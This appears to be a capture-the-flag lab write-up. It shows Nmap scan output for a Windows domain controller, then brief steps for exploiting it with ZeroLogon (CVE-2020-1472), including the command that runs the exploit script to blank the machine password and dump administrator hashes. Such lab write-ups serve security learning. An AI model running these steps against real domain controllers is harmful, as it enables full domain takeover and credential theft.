Nmap scan report for 172.31.1.29
Host is up (0.044s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-01-18 22:38:46Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: Zero.csl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: Zero.csl0., Site: Default-First-Site-Name)
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Zero-DC.Zero.csl
| Not valid before: 2022-01-17T22:36:34
|_Not valid after: 2022-07-19T22:36:34
| rdp-ntlm-info:
| Target_Name: ZERO
| NetBIOS_Domain_Name: ZERO
| NetBIOS_Computer_Name: ZERO-DC
| DNS_Domain_Name: Zero.csl
| DNS_Computer_Name: Zero-DC.Zero.csl
| Product_Version: 10.0.17763
|_ System_Time: 2022-01-18T22:38:49+00:00
|_ssl-date: 2022-01-18T22:39:32+00:00; 0s from scanner time.
Service Info: Host: ZERO-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: ZERO-DC, NetBIOS user: <unknown>, NetBIOS MAC: 0a:c6:ce:4b:0d:48 (unknown)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-01-18T22:38:49
|_ start_date: N/A
139 and 445 open - we can perform enum4linux -a to find domains.
Domain Name: ZERO Domain Sid: S-1-5-21-3994543222-2496524451-3410345432
The exploit for this box, dubbed “ZeroLogon”, allows us to instantly take over a Domain Controller by changing the machine password to an empty string.
latest impacket tool and the python script found here is needed.
Exploitation Steps:
Download the python script and chmod +x it.
Execute the script: python3 cve-2020-1472.py Zero-DC 172.31.1.29
This will change the account password to an empty string, which will let us bypass the authentication to get the administrator hashes.